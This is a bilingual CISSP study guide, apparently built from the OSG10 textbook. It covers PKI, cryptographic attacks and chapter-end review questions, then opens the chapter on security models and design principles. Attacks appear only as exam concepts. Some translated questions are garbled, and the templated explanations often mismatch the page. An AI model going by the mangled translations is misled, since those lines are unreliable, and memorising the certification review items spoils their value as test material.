哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 53 / PDF P479

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

signature on a message, decrypt the signature with the sender's public key and then compare the original message digest to one you generate yourself. If they match, the message is authentic. Understand the public key infrastructure (PKI). In the public key infrastructure, certificate authorities (CAs) generate digital certificates containing the public keys of system users. Users then distribute these certificates to people with whom they want to communicate. Certificate recipients verify a certificate using the CA's public key. Know the common applications of cryptography to secure email. The emerging standard for encrypted messages is the S/MIME protocol.

Another popular email security tool is Phil Zimmermann's Pretty Good Privacy (PGP). Most users of email encryption rely on having this technology built into their email client or their web-based email service. Know the common applications of cryptography to secure web activity. The de facto standard for secure web traffic is the use of HTTP over Transport Layer Security (TLS). This approach relies on hybrid cryptography using asymmetric cryptography to exchange an ephemeral session key, which is then used to carry on symmetric cryptography for the remainder of the session. Know the common applications of cryptography to secure networking.

The IPSec protocol standard provides a common framework for encrypting network traffic and is built into a number of common operating systems. In IPSec transport mode, packet contents are encrypted for peer-to-peer communication. In tunnel mode, the entire packet, including header information, is encrypted for gateway-to-gateway communications. Be able to describe IPSec. IPSec is a security architecture framework that supports secure communication over IP. IPSec establishes a secure channel in either transport mode or tunnel mode. It can be used to establish direct communication between computers or to set up a VPN between networks.

IPSec uses two protocols: Authentication Header (AH) and Encapsulating Security Payload (ESP). Be able to explain common cryptographic attacks. Ciphertext-only attacks require access only to the ciphertext of a message. One example of a ciphertext-only attack is the brute-force attack, which attempts to randomly find the correct cryptographic key. Frequency analysis, another ciphertextonly attack, counts characters in the ciphertext to reverse substitution ciphers. Known plaintext, chosen ciphertext, and chosen plaintext attacks

中文直译 / 整理

签名,使用发送方的公钥解密签名,然后将原始消息摘要与您自己生成的摘要 进行比较。 如果两者匹配,则消息是真实的。 理解公钥基础设施(PKI)。 在公钥基础设施中,证书颁发机构(CA)生成 包含系统用户公钥的数字证书。 用户随后将这些证书分发给希望与其通信的 人。 证书接收方使用CA的公钥验证证书。 了解密码学在保护电子邮件中的常见应用。 加密消息的新兴标准是S/MIME协 议。 另一个流行的电子邮件安全工具是Phil Zimmermann的Pretty Good Privacy(PGP)。 大多数电子邮件加密用户依赖于该技术内置在其电子邮件 客户端或基于网页的电子邮件服务中。 了解密码学在保护网络活动中的常见应用。 安全网络流量的事实标准是使用 传输层安全(TLS)协议的HTTP。 这种方法依赖于混合密码学,使用非对称 密码学交换临时会话密钥,然后使用对称密码学完成会话的其余部分。 了解密码学在保护网络通信中的常见应用。 IPSec协议标准为加密网络流量提供 了一个通用框架,并已内置到许多常见操作系统中。 在IPSec传输模式下,数据 包内容被加密以实现点对点通信。

在隧道模式下,整个数据包(包括头部信息) 被加密以实现网关到网关的通信。 能够描述IPSec。 IPSec是一种支持IP上安全通信的安全架构框架。 IPSec可以 在传输模式或隧道模式下建立安全通道。 它可以用于在计算机之间建立直接通 信,或在网络之间建立VPN。 IPSec使用两种协议:认证头(AH)和封装安全 载荷(ESP)。 能够解释常见的密码学攻击。 仅密文攻击仅需访问消息的密文。 一种仅密文攻 击的例子是暴力破解攻击,它尝试随机找出正确的加密密钥。 频率分析是另一 种仅密文攻击,通过统计密文中的字符来逆转替换密码。 已知明文、选择密文 和选择明文攻击

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
学习单元 54 / PDF P480

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

require the attacker to have some extra information in addition to the ciphertext. The on-path attack fools both parties into communicating with the attacker instead of directly with each other. The birthday attack is an attempt to find collisions in hash functions. The replay attack is an attempt to reuse authentication requests. Written Lab 1. Explain the process Bob should use if he wants to send a confidential message to Alice using asymmetric cryptography. 2. Explain the process Alice would use to decrypt the message Bob sent in question 1. 3. Explain the process Bob should use to digitally sign a message to Alice. 4.

Explain the process Alice should use to verify the digital signature on the message from Bob in question 3. Review Questions 1. Brian computes the digest of a single sentence of text using a SHA-2 hash function. He then changes a single character of the sentence and computes the hash value again. Which one of the following statements is true about the new hash value? A. The new hash value will be one character different from the old hash value. B. The new hash value will share at least 50 percent of the characters of the old hash value. C. The new hash value will be unchanged. D. The new hash value will be completely different from the old hash value. 2.

Alan believes that an attacker is collecting information about the electricity consumption of a sensitive cryptographic device and using that information to compromise encrypted data. What type of attack does he suspect is taking place? A. Brute-force

中文直译 / 整理

要求攻击者除了密文外还需具备一些额外信息。 中间人攻击通过欺骗双方,使 其与攻击者通信而非直接彼此通信。 生日攻击旨在寻找哈希函数中的碰撞。 重 放攻击旨在重用身份验证请求。 实验题 1. 解释鲍勃若想使用非对称加密向爱丽丝发送机密消息,应采用的流程。 2. 解释爱丽丝如何解密鲍勃在第1题中发送的消息。 3. 解释鲍勃应如何对发给爱丽丝的消息进行数字签名。 4. 解释爱丽丝应如何验证第3题中鲍勃消息的数字签名。 复习题 1. 布莱恩使用SHA‑2哈希函数计算一段文本的摘要。 然后他更改了该句子中 的一个字符,并再次计算哈希值。 关于新的哈希值,以下哪一项陈述是正确 的? A. 新的哈希值将与旧的哈希值仅有一个字符不同。 B. 新的哈希值将与旧的哈希值至少共享50%的字符。 C. 新的哈希值将保持不变。 D. 新的哈希值将与旧的哈希值完全不同。 2. 阿兰认为,攻击者正在收集一种敏感加密设备的电力消耗信息,并利用这 些信息破解加密数据。 他怀疑正在发生的是哪种类型的攻击? A. 暴力破解

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
身份 身份是主体在系统中的标识。
学习单元 55 / PDF P481

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

B. Side-channel C. Known plaintext D. Frequency analysis 3. If Richard wants to send an encrypted message to Sue using a public key cryptosystem, which key does he use to encrypt the message? A. Richard's public key B. Richard's private key C. Sue's public key D. Sue's private key 4. If a 2,048-bit plaintext message were encrypted with the ElGamal public key cryptosystem, how long would the resulting ciphertext message be? A. 1,024 bits B. 2,048 bits C. 4,096 bits D. 8,192 bits 5. Acme Widgets currently uses a 3,072-bit RSA encryption standard companywide. The company plans to convert from RSA to an elliptic curve cryptosystem.

If the company wants to maintain the same cryptographic strength, what ECC key length should it use? A. 256 bits B. 512 bits C. 1,024 bits D. 2,048 bits 6. John wants to produce a message digest of a 2,048-byte message he plans to send to Mary. If he uses the SHA-2 hashing algorithm, what is a possible size for the message digest generated? A. 160 bits B. 512 bits C. 1,024 bits D. 2,048 bits B.

中文直译 / 整理

旁道攻击 C. 已知明文 D. 频率分析 3. 如果理查德想使用公钥加密系统向苏发送一条加密消息,他应该使用哪个密 钥来加密消息? A. 理查德的公钥 B. 理查德的私钥 C. 苏的公钥 D. 苏的私钥 4. 如果一个 2,048 位的明文消息使用 ElGamal 公钥加密系统进行加密,生成的 密文消息会有多长? A. 1,024 位 B. 2,048 位 C. 4,096 位 D. 8,192 位 5. Acme Widgets 目前在整个公司范围内使用 3,072 位的 RSA 加密标 准。 该公司计划从 RSA 转换为椭圆曲线加密系统。 如果该公司希望保持 相同的加密强度,应使用多长的 ECC 密钥? A. 256 位 B. 512 位 C. 1,024 位 D. 2,048 位 6. 约翰希望为他计划发送给玛丽的2,048字节消息生成一个消息摘要。 如果 他使用SHA‑2哈希算法,生成的消息摘要可能的大小是多少? A. 160位 B. 512位 C. 1,024位 D. 2,048位

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 56 / PDF P482

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

7. After conducting a survey of encryption technologies used in her organization, Melissa suspects that some may be out of date and pose security risks. Which one of the following technologies is considered flawed and should no longer be used? A. SHA-3 B. TLS 1.3 C. IPSec D. SSL 3.0 8. You are developing an application that compares passwords to those stored in a Unix password file. The hash values you compute are not correctly matching those in the file. What might have been added to the stored password hashes? A. Salt B. Double hash C. Added encryption D. One-time pad 9. Richard received an encrypted message sent to him from Sue.

Sue encrypted the message using the RSA encryption algorithm. Which key should Richard use to decrypt the message? A. Richard's public key B. Richard's private key C. Sue's public key D. Sue's private key 10. Richard wants to digitally sign a message he's sending to Sue so that Sue can be sure the message came from him without modification while in transit. Which key should he use to encrypt the message digest? A. Richard's public key B. Richard's private key C. Sue's public key D. Sue's private key 7.

中文直译 / 整理

在对组织中使用的加密技术进行调查后,Melissa 怀疑其中一些可能 已过时并存在安全风险。 以下哪种技术被认为是存在缺陷且不应再使用 的? A. SHA‑3 B. TLS 1.3 C. IPSec D. SSL 3.0 8. 你正在开发一个应用程序,用于将密码与存储在 Unix 密码文件中的密码 进行比较。 你计算的哈希值与文件中的值不匹配。 存储的密码哈希中可能添 加了什么? A. 盐 B. 双哈希 C. 额外加密 D. 一次性密码本 9. 理查德收到了苏发送给他的加密消息。 苏 使用RSA加密算法对消息进行了加密。 理查德应该使用哪个密钥来解密消息? A. 理查德的公钥 B. 理查德的私钥 C. 苏的公钥 D. 苏的私钥 10. 理查德希望对发送给苏的消息进行数字签名,以便苏可以确保消息在传输 过程中未被篡改且确实来自他。 他应该使用哪个密钥来加密消息摘要? A. 理查德的公钥 B. 理查德的私钥 C. 苏的公钥 D. 苏的私钥

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

签名支持完整性、真实性和不可否认性,不等于加密全文。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 57 / PDF P483

第 483 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

11. Which one of the following algorithms is not supported by the Digital Signature Standard under FIPS 186-5? A. Edwards-Curve DSA B. RSA C. ElGamal DSA D. Elliptic Curve DSA 12. Which International Telecommunications Union (ITU) standard governs the creation and endorsement of digital certificates for secure electronic communication? A. X.500 B. X.509 C. X.900 D. X.905 13. Ron believes that an attacker accessed a highly secure system in his data center and applied high-voltage electricity to it in an effort to compromise the cryptographic keys that it uses. What type of attack does he suspect? A. Implementation attack B. Fault injection C. Timing D. Chosen ciphertext 14.

Brandon is analyzing network traffic and is searching for user attempts to access websites over secure TLS connections. What TCP port should Brandon add to his search filter because it would normally be used by this traffic? A. 22 B. 80 C. 443 D. 1433 15. Beth is assessing the vulnerability of a cryptographic system to attack. She believes that the cryptographic keys are properly secured and that 11.

中文直译 / 整理

以下哪种算法不被数字 FIPS 186‑5下的签名标准? A. Edwards曲线DSA B. RSA C. ElGamal DSA D. 椭圆曲线DSA 12. 哪种国际电信联盟(ITU)标准规定了安全电子通信中数字证书的创建和 认证? A. X.500 B. X.509 C. X.900 D. X.905 13. 罗恩认为,攻击者访问了他数据中心中一个高度安全的系统,并对其施加 了高电压,试图获取其使用的加密密钥。 这种攻击属于 p什么类型的攻击? 嫌疑人? A. 实现攻击 B. 故障注入 C. 定时 D. 选择密文 14. 布兰登正在分析网络流量,正在查找用户通过安全的TLS连接访问网站 的尝试。 布兰登应在搜索过滤器中添加哪个TCP端口,因为该端口通常用于 此类流量? A. 22 B. 80 C. 443 D. 1433 15. 贝丝正在评估加密系统遭受攻击的脆弱性。 她认为加密密钥已得到妥善保 护,且

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 483 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

证书不是密钥本身,而是身份与公钥的可信绑定。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 58 / PDF P484

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

the system is using a modern, secure algorithm. Which one of the following attacks would most likely still be possible against the system by an external attacker who did not participate in the system and did not have physical access to the facility? A. Ciphertext-only B. Known plaintext C. Chosen plaintext D. Fault injection 16. Which of the following tools can be used to improve the effectiveness of a brute-force password cracking attack? A. Rainbow tables B. Hierarchical screening C. TKIP D. Random enhancement 17. Chris is searching a Windows system for binary key files and wishes to narrow his search using file extensions.

Which one of the following certificate formats is closely associated with Windows binary certificate files? A. CCM B. PEM C. PFX D. P7B 18. What is the major disadvantage of using certificate revocation lists? A. Key management B. Latency C. Record keeping D. Vulnerability to brute-force attacks 19. Which one of the following encryption algorithms is now considered insecure? A. Advanced Encryption Standard

中文直译 / 整理

系统使用的是现代安全的算法。 以下哪种攻击最有可能被一个未参与该系 统且未获得设施物理访问权限的外部攻击者成功实施? A. 仅密文 B. 已知明文 C. 选择明文 D. 故障注入 16. 以下哪种工具可用于提高暴力破解密码攻击的有效性? A. 彩虹表 B. 层次化筛选 C. TKIP D. 随机增强 17. 克里斯正在搜索Windows系统中的二进制密钥文件,并希望使用文件 扩展名缩小搜索范围。 以下哪种证书格式与Windows二进制证书文件密切 相关? A. CCM B. PEM C. PFX D. P7B 18. 使用证书吊销列表的主要缺点是什么? A. 密钥管理 B. 延迟 C. 记录维护 D. 易受暴力破解攻击 19. 以下哪种加密算法现在被认为不安全? A. 高级加密标准

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

证书不是密钥本身,而是身份与公钥的可信绑定。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 59 / PDF P485

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

B. RSA C. Elliptic Curve Cryptography D. Merkle–Hellman Knapsack 20. Brian is upgrading a system to support SSH-2 rather than SSH-1. Which one of the following advantages will he achieve? A. Support for multifactor authentication B. Support for simultaneous sessions C. Support for 3DES encryption D. Support for IDEA encryption B. RSA C.

中文直译 / 整理

椭圆曲线加密 D. Merkle–Hellman 背包 20. Brian 正在升级系统,以支持 SSH‑2 而非 SSH‑1。 他将获得以下哪一项优势? A. 支持多因素身份验证 B. 支持并发会话 C. 支持3DES加密 D. 支持IDEA加密

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
身份 身份是主体在系统中的标识。
第 8 章 · P487-543 · 57 个学习单元

安全模型、设计与能力原则

OSG10 · Chapter 8 · Principles of Security Models, Design, and Capabilities · 全文覆盖 + 小白精读 + 画报

第 8 章:安全模型、设计与能力原则

这不是提炼版。本页按 PDF 第 487-543 页连续覆盖第 8 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

57个连续学习单元
4格原文 / 直译 / 解释 / 考点
57页覆盖第8章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P487

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 3.0: Security Architecture and Engineering 3.1 Research, implement and manage engineering processes using secure design principles 3.1.4 Secure defaults 3.1.5 Fail securely 3.1.7 Keep it simple and small 3.1.8 Zero trust or trust but verify 3.1.9 Privacy by design 3.1.11 Secure access service edge 3.2 Understand the fundamental concepts of security models (e.g.

Biba, Star Model, Bell-LaPadula) 3.3 Select controls based upon systems security requirements 3.4 Understand security capabilities of Information Systems (IS) (e.g., memory protection, Trusted Platform Module (TPM), encryption/decryption) 3.10 Manage the information system lifecycle 3.10.1 Stakeholders needs and requirements 3.10.2 Requirements analysis 3.10.3 Architectural design 3.10.4 Development/implementation 3.10.5 Integration 3.10.6 Verification and validation 3.10.7 Transition/deployment 3.10.8 Operations and maintenance/sustainment 3.10.9 Retirement/disposal

中文直译 / 整理

本章涵盖的CISSP主题包括: 第3域:安全架构与工程 3.1 使用安全设计原则研究、实施和管理工程流程 3.1.4 安全默认值 3.1.5 安全失败 3.1.7 保持简单和精简 3.1.8 零信任或信任但验证 3.1.9 隐私由设计保障 3.1.11 安全访问服务边缘 3.2 理解安全模型的基本概念(例如 Biba、Star 模型、Bell‑LaPadula) 3.3 根据系统安全要求选择控制措施 3.4 理解信息系统(IS)的安全功能(例如内存保护、可信平台模 块(TPM)、加密/解密) 3.10 管理信息系统生命周期 3.10.1 相关方的需求和要求 3.10.2 需求分析 3.10.3 架构设计 3.10.4 开发/实施 3.10.5 集成 3.10.6 验证与确认 3.10.7 转换/部署 3.10.8 运营与维护/持续支持 3.10.9 退役/处置

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

零信任:零信任默认不信任任何访问请求,需要持续验证和最小权限。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

永不默认信任、持续验证、最小权限、微分段是零信任关键词。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
学习单元 02 / PDF P488

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

Understanding the philosophy behind security solutions helps limit your search for the best controls for your specific security needs. In this chapter, we discuss secure system design principles, security models, the Common Criteria, and security capabilities of information systems.

Domain 3 includes a variety of topics that are discussed in other chapters, including the following: Chapter 1, “Security Governance Through Principles and Policies” Chapter 6, “Cryptography and Symmetric Key Algorithms” Chapter 7, “PKI and Cryptographic Applications” Chapter 8, “Principles of Security Models, Design, and Capabilities” Chapter 9, “Security Vulnerabilities, Threats, and Countermeasures” Chapter 10, “Physical Security Requirements” Chapter 14, “Controlling and Monitoring Access” Chapter 16, “Managing Security Operations” Chapter 20, “Software Development Security” Chapter 21, “Malicious Code and Application Attacks” Secure Design Principles Security should be a consideration at every stage of a system's development.

